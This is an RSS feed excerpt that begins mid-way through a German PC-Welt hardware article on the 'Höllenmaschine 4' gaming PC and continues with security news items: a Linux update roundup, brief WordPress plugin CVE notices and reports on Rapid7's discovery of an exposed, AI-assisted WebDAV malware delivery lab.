<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a23f8a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/OCZ-RevoDrive-3-X2.jpg?quality=50&amp;strip=all" alt="OCZ RevoDrive 3 X2: SSD der Höllenmaschine 4" class="wp-image-3188932" width="1024" height="725" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Die erste SSD in einer Höllenmaschine: OCZ RevoDrive 3 X2</figcaption></figure><p class="imageCredit">OCZ/Kioxia </p></div>



<p>Das interne Backup übernimmt ein RAID-5‑Verbund aus vier 1-Terabyte-Festplatten. Dabei kommt das derzeit schnellste 3,5-Zoll-Laufwerk im Test zum Einsatz, die <a href="https://web.archive.org/web/20121006075341/http://www.pcwelt.de/produkte/Test-Western-Digital-VelociRaptor-WD1000D-Festplatte-5763554.html">Western Digital VelociRaptor WD1000DHTZ</a>. Die VelociRaptor rotiert mit 10.000 Umdrehungen pro Minute und puffert Zugriffe in einem 64 MB großen Cache. Die maximale Datenrate der Festplatte liegt bei 210 Megabyte pro Sekunde, die durchschnittliche Zugriffszeit bei 3,7 Millisekunden. Als RAID-5‑Verbund kommt das Platten-Quartett auf bis zu 560 Megabyte pro Sekunde und stellt dabei noch knapp 2,7 Gigabyte nutzbare Kapazität zur Verfügung.</p>



<p>Die Aufgabe des klassischen Massenspeichers für umfangreiche Foto-, Musik- und Videosammlungen übernehmen die beiden 3,5-Zoll-Festplatten <a href="https://web.archive.org/web/20120922021349/http://www.pcwelt.de/produkte/Test-Western-Digital-Caviar-Green-WD30EZRX-6091202.html">Western Digital Caviar Green 3000GB WD30EZRX</a>. Die besonders stromsparenden Laufwerke stecken in den zwei abschließbaren Hot-Swap-Schächten der Höllenmaschine 4. So lassen sich schnell und bequem knapp 5,5 Terabyte nutzbarer Speicherplatz im laufenden Betrieb an- und abstöpseln oder auch mal unkompliziert von A nach B tragen.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading toc">Stromversorgung: bis zu 105 Ampere auf der 12-Volt-Schiene</h2>



<p>Keine Kompromisse machen wir bei der Stromversorgung der Höllenmaschine 4. Das <a href="https://web.archive.org/web/20121005045440/http://coolermaster.de/product.php?product_id=6744" target="_blank" rel="noreferrer noopener">Cooler Master Silent Pro Hybrid 1300W</a> bietet genügend Reserven, um alle Komponenten zuverlässig mit Energie zu versorgen. Das vollständig modulare Netzteil stellt auf der 12-Volt-Schiene in der Spitze bis zu 105 Ampere bereit und federt damit auch locker die Lastspitzen der stromhungrigen Grafikkarten ab.</p>



<p>Aufgrund der “<a href="https://web.archive.org/web/20121005072013/http://www.plugloadsolutions.com/80PlusPowerSupplies.aspx">80 PLUS Gold</a>“-Zertifizierung arbeitet das ATX-2.3-Kraftpaket mit einem Wirkungsgrad von über 90 Prozent trotzdem sehr energieeffizient. Dank der semipassiven Kühlung ist das 1300-Watt-Netzteil aber auch flüsterleise. Zudem erlaubt die im Lieferumfang enthaltene 5,25-Zoll-Lüftersteuerung neben dem automatischen Modus ein stufenlos regulierbares Drehtempo für den 130-Millimeter-Lüfter – bei harter Dauerbelastung drehen Sie den Regler einfach voll auf.</p>



<p>Um optische Massenspeicher kümmert sich der Blu-ray-Brenner <a href="https://web.archive.org/web/20120905095420if_/http://www.asus.de/Optical_Storage/Internal_Bluray_Drive/BW12B1ST/">Asus BW-12B1ST</a>. Das Multi-Norm-Laufwerk versteht sich aber auch auf alle gängigen CD- und DVD-Formate. Bei maximal 12-fachem Schreibtempo füllt das Asus-Modell einen einlagigen 25-GB-BR-Rohling in rund 11 Minuten. BD-REs beschreibt das SATA-Laufwerk mit 2-fachem Tempo, Blu-ray-Medien liest er mit 8-facher Geschwindigkeit. Im Lieferumfang des Asus BW-12B1ST ist Software für das Backup, Brennen und Abspielen von Blu-rays enthalten.</p>



<h2 class="wp-block-heading toc">Peripherie: Luxus-Eingabegeräte und 5.1-Raumklang</h2>



<p>Die <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121027093942/http://www.logitech.com/de-de/mice-pointers/mice/5092">Logitech G9x Laser Mouse</a> kommt mit einem 4-Wege-Scrollrad und löst mit bis zu 5700 dpi auf. Die USB-Maus besitzt eine anpassbare Griffschale sowie ein bis auf 28 Gramm aufrüstbares Gewichtsmagazin. Der interne Speicher sichert bis zu fünf Profile für individuelle Tastatur-Makros und Abtastraten.</p>



<p>Das <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121007015940/http://www.logitech.com/de-de/keyboards/keyboards/4956">Logitech G19 Gaming Keyboard</a> besitzt ein integriertes Farb-LCD, das in Echtzeit Spiele-Informationen wie die Server-IP-Adresse oder den Punktestand für über 35 Titel anzeigt. Die G19 erlaubt verschiedene Beleuchtungsfarben und hat 12 voll programmierbare G-Tasten sowie Sondertasten für den schnellen Multimedia-Zugriff. Das Logitech-Modell fungiert aber auch als aktiver 2-fach-USB-Hub und überrascht mit einer Kabelführung auf der Unterseite für Maus und Headset.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a60804a247c5"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/Logitech-G19-Gaming-Keyboard.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Logitech G19 Gaming Keyboard" class="wp-image-3190427" width="1200" height="816" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Logitech</p></div>



<p>Das THX-zertifizierte Lautsprecherset <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20120927123116/http://www.logitech.com/de-de/speakers-audio/home-pc-speakers/speaker-system-Z906">Logitech Z906</a> bietet 5.1-Raumklang mit digitaler Dolby- und DTS-Decodierung. Bis zu sechs digitale und analoge Audioquellen lassen sich gleichzeitig an die Bedienkonsole anschließen. Alternativ bedienen Sie das 500-Watt-Lautsprechersystem kabellos über die Fernbedienung.</p>



<p>Wer nachts die Nachbarn nicht stören darf, greift zum <a href="https://logitech-de.a58n.net/c/230135/592382/9750?subid1=rss&amp;u=https://web.archive.org/web/20121014132143/http://www.logitech.com/de-de/gaming/headsets/7248">Logitech G930 Wireless Gaming Headset</a>. Das funkt digital mit 2,4 Gigahertz zehn Stunden lang über eine Reichweite von bis zu 12 Metern. Das Headset kommt mit drei programmierbaren Tasten, Geräuschunterdrückung und Kondensatormikrofon. Dank der Dolby-Technik Headphone und Pro Logic II kann das G930 sogar 7.1-Surround-Sound simulieren.</p>



<h2 class="wp-block-heading toc">Kreativ-, Spiele- und Office-Paket für 4000 Euro</h2>



<p>Auf der Höllenmaschine 4 vorinstalliert haben wir das 64-Bit-Betriebssystem <a href="https://web.archive.org/web/20121004014010/http://www.pcwelt.de/special/Windows-7-1001833.html">Windows 7 Ultimate</a>. Für das Microsoft-Betriebssystem haben wir uns auch wegen der DirectX-11-Unterstützung entschieden. Das laut Windows-Experte Hermann Apfelböck “beste Windows aller Zeiten” verwöhnt in der multilingualen Ultimate-Variante mit den exklusiven Funktionen Bitlocker-Verschlüsselung und dem nützlichen VHD-Boot.</p>



<p>Dazu gibt es drei fette Software-Pakete frei Haus. Das Highlight für Kreative ist die <a href="https://web.archive.org/web/20120701102134/http://success.adobe.com/de/de/sem/products/creativesuite/dwp.html">Adobe Creative Suite 6 Design &amp; Web Premium</a>. Die „Rundum glücklich“-Lösung für professionelle Bildbearbeitung, Layout und Website-Design integriert die Digital Publishing Suite und enthält folgende Programme und Werkzeuge: Acrobat X Pro, Bridge, Dreamweaver, Flash Builder, Flash Professional, Fireworks, Illustrator, InDesign, Media Encoder und Photoshop Extended.</p>



<p>Was zum Spielen spendiert Grafikspezialist Nvidia der Höllenmaschine 4. Das Gaming-Paket enthält die AAA-Titel Alan Wake Collector’s Edition, Batman: Arkham City, Battlefield 3, Borderlands, Call of Duty: Modern Warfare 3, Crysis 2, Diablo 3, Deus Ex: Human Revolution, Duke Nukem Forever, L.A. Noire, Mass Effect 3, Max Payne 3, Metro 2033, Rage, Skyrim, Starcraft II: Wings of Liberty, Star Wars. The Old Republik, The Witcher 2: Assassins of Kings.</p>



<p>Und wer die Höllenmaschine im Büroeinsatz unterfordern will, installiert <a href="https://web.archive.org/web/20101125155934/http://www.pcwelt.de/news/Jetzt-fuer-alle-Microsoft-Office-2010-ab-sofort-verfuegbar-988766.html">Microsoft Office Professional 2010</a>. Das Paket enthält die Programme Access, Excel, InfoPath, OneNote, Outlook, Powerpoint, Publisher, SharePoint, Word und Workspace.</p>



<p>Hinweis: Hier endet der Artikel über die Höllenmaschine 4 aus dem Jahre 2014.</p>



<h2 class="wp-block-heading toc">So gewinnen Sie die HMX 6</h2>



<p>Auch dieses Jahr verlosen wir die Höllenmaschine unter allen Teilnehmern:</p>


<span class="cta_btn_heading cta_btn_heading_"></span><div class="cta wp-block wp-block-button cta__btn_"><a class="cta__btn" href="https://www.pcwelt.de/article/3179491/hmx-6-gewinnspiel.html" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Gewinnen Sie hier die HMX 6</a></div>


<h2 class="wp-block-heading toc">Wie Sie die HMX 6 verfolgen können</h2>



<p>In den kommenden Wochen folgen weitere Inhalte rund um die Höllenmaschine 6 auf <a href="https://www.youtube.com/playlist?list=PLVC_WMwVwvSiOOgt6D9mN4Ud71M_uLFsS">YouTube</a>, <a href="https://www.instagram.com/pcwelt/">Instagram</a>, <a href="https://www.tiktok.com/@pcwelt.de">TikTok</a>, <a href="https://www.facebook.com/pcwelt/reels/">Facebook </a>und natürlich auf <a href="https://www.pcwelt.de/hmx" target="_blank" rel="noreferrer noopener">pcwelt.de</a>. Wenn Sie nichts verpassen wollen, sollten Sie den kostenlosen <a href="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">HMX-6-Newsletter abonnieren</a> – aber vergessen Sie nicht, die Anmeldung via E-Mail zu bestätigen.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), Debian (samba), Fedora (c-ares, d...]]></description>
<link>https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683836/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 21 Jul 2026 15:27:30 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (capstone, fence-agents, gimp, glib2, hplip, httpd, jackson-annotations, jackson-core, jackson-databind, jackson-jaxrs-providers, and jackson-modules-base, libtiff, maven:3.8, pacemaker, python3.14, and webkit2gtk3), <b>Debian</b> (samba), <b>Fedora</b> (c-ares, dnsx, freerdp, gpsd, libreswan, libseccomp, libtiff, mingw-python-idna, mingw-python-pip, openssh, python-pillow, wget1, and wireshark), <b>Mageia</b> (golang, graphicsmagick, haveged, libssh2, nginx, nilfs-utils, perl-CGI-Session, perl-Imager, perl-JavaScript-Minifier-XS, php, php8.4, php8.5, python-nltk, sqlite3, and xmlstarlet), <b>Oracle</b> (.NET 10.0, .NET 9.0, container-tools:ol8, firefox, giflib, glibc, go-fdo-client, go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, hplip, httpd, image-builder, kernel, libtiff, mod_http2, pacemaker, perl-DBI:1.641, perl-HTTP-Daemon, php:8.2, python-markdown, ruby4.0, systemd, and thunderbird), <b>Red Hat</b> (buildah, container-tools:rhel8, dracut, golang-github-openprinting-ipp-usb, libtiff, osbuild-composer, python-urllib3, python3.12-urllib3, python3.14-urllib3, and runc), <b>SUSE</b> (389-ds, chromedriver, gstreamer-plugins-bad, libreoffice, libsuricata8_0_6, podman, python311, and sssd), and <b>Ubuntu</b> (apache2, freerdp3, freetype, libde265, libxfont, linux, linux-gcp, linux-gcp-6.8, linux-gke, linux-gkeop, linux-realtime, linux-realtime-6.8, linux, linux-gcp, linux-gcp-fips, linux-gke, linux-gkeop, linux-hwe-5.15, linux-kvm, linux-lowlatency, linux-lowlatency-hwe-5.15, linux-realtime, linux-xilinx-zynqmp, linux, linux-gcp, linux-gke, linux-realtime, linux-gcp-6.17, linux-realtime-6.17, linux-gcp-fips, linux-hwe-7.0, linux-nvidia-tegra-5.15, linux-oem-7.0, nginx, php8.1, php8.3, php8.5, rlottie, sqlite3, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-11767 | Elementor Free Builder for Elementor Plugin up to 1.6.6 on WordPress Contact Form cross site scripting (EUVD-2026-46159)]]></title>
<description><![CDATA[A vulnerability was found in Elementor Free Builder for Elementor Plugin up to 1.6.6 on WordPress. It has been classified as problematic. Affected is an unknown function of the component Contact Form. The manipulation leads to cross site scripting.

This vulnerability is traded as CVE-2026-11767....]]></description>
<link>https://tsecurity.de/de/3683444/sicherheitsluecken/cve-2026-11767-elementor-free-builder-for-elementor-plugin-up-to-166-on-wordpress-contact-form-cross-site-scripting-euvd-2026-46159/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683444/sicherheitsluecken/cve-2026-11767-elementor-free-builder-for-elementor-plugin-up-to-166-on-wordpress-contact-form-cross-site-scripting-euvd-2026-46159/</guid>
<pubDate>Tue, 21 Jul 2026 12:56:14 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/elementor:free_builder_for_elementor_plugin">Elementor Free Builder for Elementor Plugin up to 1.6.6</a> on WordPress. It has been classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function of the component <em>Contact Form</em>. The manipulation leads to cross site scripting.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-11767">CVE-2026-11767</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60030 | themexpert Quix Page Builder Pro Plugin up to 6.2.0 Media access control (EUVD-2026-46056)]]></title>
<description><![CDATA[A vulnerability categorized as problematic has been discovered in themexpert Quix Page Builder Pro Plugin up to 6.2.0. This vulnerability affects unknown code of the component Media. The manipulation results in improper access controls.

This vulnerability is cataloged as CVE-2026-60030. The atta...]]></description>
<link>https://tsecurity.de/de/3683442/sicherheitsluecken/cve-2026-60030-themexpert-quix-page-builder-pro-plugin-up-to-620-media-access-control-euvd-2026-46056/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683442/sicherheitsluecken/cve-2026-60030-themexpert-quix-page-builder-pro-plugin-up-to-620-media-access-control-euvd-2026-46056/</guid>
<pubDate>Tue, 21 Jul 2026 12:56:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">problematic</a> has been discovered in <a href="https://vuldb.com/product/themexpert:quix_page_builder_pro_plugin">themexpert Quix Page Builder Pro Plugin up to 6.2.0</a>. This vulnerability affects unknown code of the component <em>Media</em>. The manipulation results in improper access controls.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2026-60030">CVE-2026-60030</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-60028 | themexpert Quix Page Builder Pro Plugin up to 6.1.x SVG cross site scripting (EUVD-2026-46053)]]></title>
<description><![CDATA[A vulnerability was found in themexpert Quix Page Builder Pro Plugin up to 6.1.x and classified as problematic. Affected is an unknown function of the component SVG. Such manipulation leads to cross site scripting.

This vulnerability is referenced as CVE-2026-60028. It is possible to launch the ...]]></description>
<link>https://tsecurity.de/de/3683438/sicherheitsluecken/cve-2026-60028-themexpert-quix-page-builder-pro-plugin-up-to-61x-svg-cross-site-scripting-euvd-2026-46053/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683438/sicherheitsluecken/cve-2026-60028-themexpert-quix-page-builder-pro-plugin-up-to-61x-svg-cross-site-scripting-euvd-2026-46053/</guid>
<pubDate>Tue, 21 Jul 2026 12:56:05 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/themexpert:quix_page_builder_pro_plugin">themexpert Quix Page Builder Pro Plugin up to 6.1.x</a> and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. Affected is an unknown function of the component <em>SVG</em>. Such manipulation leads to cross site scripting.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-60028">CVE-2026-60028</a>. It is possible to launch the attack remotely. No exploit is available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-13439 | WhiteStudio Easy Form Builder Plugin up to 4.0.11 on WordPress Password Recovery efb_set_password sid password recovery (EUVD-2026-46156)]]></title>
<description><![CDATA[A vulnerability was found in WhiteStudio Easy Form Builder Plugin up to 4.0.11 on WordPress. It has been declared as critical. This affects the function efb_set_password of the file /v1/forms/recovery/efb_set_password of the component Password Recovery. Executing a manipulation of the argument si...]]></description>
<link>https://tsecurity.de/de/3683151/sicherheitsluecken/cve-2026-13439-whitestudio-easy-form-builder-plugin-up-to-4011-on-wordpress-password-recovery-efbsetpassword-sid-password-recovery-euvd-2026-46156/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3683151/sicherheitsluecken/cve-2026-13439-whitestudio-easy-form-builder-plugin-up-to-4011-on-wordpress-password-recovery-efbsetpassword-sid-password-recovery-euvd-2026-46156/</guid>
<pubDate>Tue, 21 Jul 2026 11:12:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/whitestudio:easy_form_builder_plugin">WhiteStudio Easy Form Builder Plugin up to 4.0.11</a> on WordPress. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This affects the function <code>efb_set_password</code> of the file <em>/v1/forms/recovery/efb_set_password</em> of the component <em>Password Recovery</em>. Executing a manipulation of the argument <em>sid</em> can lead to weak password recovery.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-13439">CVE-2026-13439</a>. The attack can be executed remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Offener WebDAV-Server legt KI-gestütztes Phishing-Toolkit offen]]></title>
<description><![CDATA[MEXIKO / LONDON (IT BOLTWISE) – Ein falsch abgesicherter Delivery-Server hat ein KI-gestütztes Phishing-Toolkit während der Entwicklung offengelegt. Rapid7 konnte dabei mehr als 1.000 Dateien sichern – inklusive Testprotokollen, Builder-Notizen und Live-Delivery-Logs. Im Zentrum steht eine WebDAV...]]></description>
<link>https://tsecurity.de/de/3682787/it-security-nachrichten/offener-webdav-server-legt-ki-gestuetztes-phishing-toolkit-offen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682787/it-security-nachrichten/offener-webdav-server-legt-ki-gestuetztes-phishing-toolkit-offen/</guid>
<pubDate>Tue, 21 Jul 2026 08:08:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-webdav-phishing-toolkit-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">MEXIKO / LONDON (IT BOLTWISE) – Ein falsch abgesicherter Delivery-Server hat ein KI-gestütztes Phishing-Toolkit während der Entwicklung offengelegt. Rapid7 konnte dabei mehr als 1.000 Dateien sichern – inklusive Testprotokollen, Builder-Notizen und Live-Delivery-Logs. Im Zentrum steht eine WebDAV-basierte Working-Directory-Manipulation, die signierte Windows-Binaries missbraucht, um Warnhinweise zu umgehen. Besonders brisant: Die Unterlagen deuten auf einen LLM-Workflow hin, […]</p>
<div><a href="https://www.it-boltwise.de/offener-webdav-server-legt-ki-gestuetztes-phishing-toolkit-offen.html">... den vollständigen Artikel <strong>»Offener WebDAV-Server legt KI-gestütztes Phishing-Toolkit offen«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/offener-webdav-server-legt-ki-gestuetztes-phishing-toolkit-offen.html">Offener WebDAV-Server legt KI-gestütztes Phishing-Toolkit offen</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign]]></title>
<description><![CDATA[A malware operator left its delivery server wide open, and Rapid7 pulled down the whole toolkit: 1,048 files spanning lure templates, filename-spoofing tests, execution experiments, droppers, builder notes, and two campaign chains. One was already live against Windows users in Mexico, delivering ...]]></description>
<link>https://tsecurity.de/de/3681918/it-security-nachrichten/exposed-server-reveals-ai-assisted-phishing-toolkit-behind-webdav-malware-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681918/it-security-nachrichten/exposed-server-reveals-ai-assisted-phishing-toolkit-behind-webdav-malware-campaign/</guid>
<pubDate>Mon, 20 Jul 2026 20:08:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A malware operator left its delivery server wide open, and Rapid7 pulled down the whole toolkit: 1,048 files spanning lure templates, filename-spoofing tests, execution experiments, droppers, builder notes, and two campaign chains. One was already live against Windows users in Mexico, delivering an infostealer through a fake government ID-lookup site over WebDAV.

What makes it more than a]]></content:encoded>
</item>
<item>
<title><![CDATA[Exposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign]]></title>
<description><![CDATA[A malware operator left its delivery server wide open, and Rapid7 pulled down the whole toolkit: 1,048 files spanning lure templates, filename-spoofing tests, execution experiments, droppers, builder notes, and two campaign chains. One was already live against Windows users in…
Read more →
The po...]]></description>
<link>https://tsecurity.de/de/3681914/it-security-nachrichten/exposed-server-reveals-ai-assisted-phishing-toolkit-behind-webdav-malware-campaign/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681914/it-security-nachrichten/exposed-server-reveals-ai-assisted-phishing-toolkit-behind-webdav-malware-campaign/</guid>
<pubDate>Mon, 20 Jul 2026 20:08:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A malware operator left its delivery server wide open, and Rapid7 pulled down the whole toolkit: 1,048 files spanning lure templates, filename-spoofing tests, execution experiments, droppers, builder notes, and two campaign chains. One was already live against Windows users in…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/exposed-server-reveals-ai-assisted-phishing-toolkit-behind-webdav-malware-campaign/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/exposed-server-reveals-ai-assisted-phishing-toolkit-behind-webdav-malware-campaign/">Exposed Server Reveals AI-Assisted Phishing Toolkit Behind WebDAV Malware Campaign</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-8825 | Elementor Website Builder Plugin up to 4.1.3 on WordPress REST Endpoint information disclosure (EUVD-2026-45892)]]></title>
<description><![CDATA[A vulnerability has been found in Elementor Website Builder Plugin up to 4.1.3 on WordPress and classified as problematic. The affected element is an unknown function of the component REST Endpoint. This manipulation causes information disclosure.

This vulnerability is handled as CVE-2026-8825. ...]]></description>
<link>https://tsecurity.de/de/3681746/sicherheitsluecken/cve-2026-8825-elementor-website-builder-plugin-up-to-413-on-wordpress-rest-endpoint-information-disclosure-euvd-2026-45892/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681746/sicherheitsluecken/cve-2026-8825-elementor-website-builder-plugin-up-to-413-on-wordpress-rest-endpoint-information-disclosure-euvd-2026-45892/</guid>
<pubDate>Mon, 20 Jul 2026 19:03:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/product/elementor:website_builder_plugin">Elementor Website Builder Plugin up to 4.1.3</a> on WordPress and classified as <a href="https://vuldb.com/kb/risk">problematic</a>. The affected element is an unknown function of the component <em>REST Endpoint</em>. This manipulation causes information disclosure.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-8825">CVE-2026-8825</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[From a Single Alert to 1,000 Files: Inside an Exposed WebDAV Malware Delivery Lab]]></title>
<description><![CDATA[Executive summaryAn MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery...]]></description>
<link>https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681303/it-security-nachrichten/from-a-single-alert-to-1000-files-inside-an-exposed-webdav-malware-delivery-lab/</guid>
<pubDate>Mon, 20 Jul 2026 15:53:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Executive summary</h2><p><span>An MDR alert recently led our team to an exposed server that was doing more than hosting payloads. It was functioning as a fully operational malware delivery lab. Containing over 1,000 artifacts, the infrastructure served as a QA hub where attackers systematically tested delivery paths, social engineering lures, and WebDAV execution methods.</span></p><p><span>Our analysis reveals an interesting shift in adversary operations: attackers are adopting generative AI to move beyond individual exploits and operate like modern software product teams. By leveraging LLMs for rapid lure generation, detailed README documentation, and automated testing, they are significantly accelerating their development cycle.</span></p><p><span>This incident underscores the imperative of preemptive security. By unifying exposure management with detection and response, we did not just catch a single campaign; we gained visibility into the attacker’s entire delivery pipeline. Although the server hosted many malware samples, the more interesting find was the view into the attacker’s workflow. The exposed infrastructure showed how the operator tested delivery paths, packaged lures, staged payloads, and monitored delivery activity. All of it with the help of generative AI.</span></p><h2>Introduction: From MDR alert to attacker infrastructure</h2><p><span>The investigation started with an MDR alert after a user executed a file pulled from a WebDAV server using </span><span><span data-type="inlineCode">rundll32.exe</span></span><span>. Telemetry 